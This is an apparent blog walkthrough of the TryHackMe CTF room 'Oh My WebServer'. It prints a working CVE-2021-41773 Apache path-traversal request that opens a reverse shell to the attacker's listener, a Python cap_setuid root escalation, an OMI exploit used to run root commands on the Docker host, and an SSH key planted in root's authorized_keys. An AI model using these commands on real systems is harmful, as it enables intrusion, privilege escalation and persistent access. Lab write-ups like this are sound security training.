Oh My WebServer – Walkthrough En | TryHackMe – Write-up

Can you root me?

 

Oh My WebServer is a medium-difficulty CTF room on TryHackMe. You have to exploit a well-known flaw in Apache 2.4.49 (a path traversal that turns into remote code execution when CGI is enabled) and then escape from the Docker container to get root on the host.

 

Enumeration

Command :

nmap -T5 -p- -sVC 10.10.242.208

On port 80, Apache 2.4.49 is running. This version has a well-known and easy-to-exploit vulnerability, CVE-2021-41773: a path traversal in the path-normalisation code that, since mod_cgi is enabled on this box, gives remote code execution.

 

Initial Foothold

Exploiting this flaw is very simple. Start a listener on your machine first (nc -lvnp 4848), then send a single curl request to /cgi-bin: the .%2e segments traverse out of the cgi-bin directory to /bin/bash, mod_cgi executes it, and the POST body is fed to bash on stdin, which spawns the reverse shell. The two leading echo commands produce the CGI header Apache expects; without them the command still runs, but Apache answers with a 500 error instead of the script output.

Command :

curl -v 'http://10.10.242.208:80/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; /bin/bash -i >& /dev/tcp/10.11.38.124/4848 0>&1' -H "Content-Type: text/plain"

Lateral movement - daemon to root

We land in a Docker container, as the .dockerenv file shown by ls -al / tells us.

 

Capabilities

python3.7 has the cap_setuid capability set.

Command :

getcap -r / 2>/dev/null

GTFOBins lists a way to use this capability to switch to the root account: call setuid(0) from Python, then spawn a shell.

Command :

/usr/bin/python3.7 -c 'import os; os.setuid(0); os.system("/bin/sh")'

Privilege Escalation

In the /tmp folder there is an omi.py file, an exploit for the OMI management agent listening on the Docker host. Running it from the container executes commands as root on the host itself, which is how we leave the container and obtain root rights. Reading the root flag on the host:

Command :

/usr/bin/python3.7 omi.py -t 10.10.242.208 -c 'cat /root/flag.txt'

Sorry, the screenshot does not show the full command line.

SSH connection

It is also possible to get a proper shell on the host: use the same exploit to append a public key to the file /root/.ssh/authorized_keys, then log in over SSH as root.

Command to create a private/public key pair :

ssh-keygen

Command (the redirection must be inside the quoted -c argument so that it runs on the host, not in the container shell) :

/usr/bin/python3.7 omi.py -t 10.10.242.208 -c 'echo "<public key here>" >> /root/.ssh/authorized_keys'

Then connect with the matching private key :

ssh root@10.10.242.208 -i id_rsa


That’s all folks

Thank you for taking the trouble to come to the site to read this Write-Up

I hope you enjoyed it and that it taught you something new.

Feel free to leave a comment or share this article.
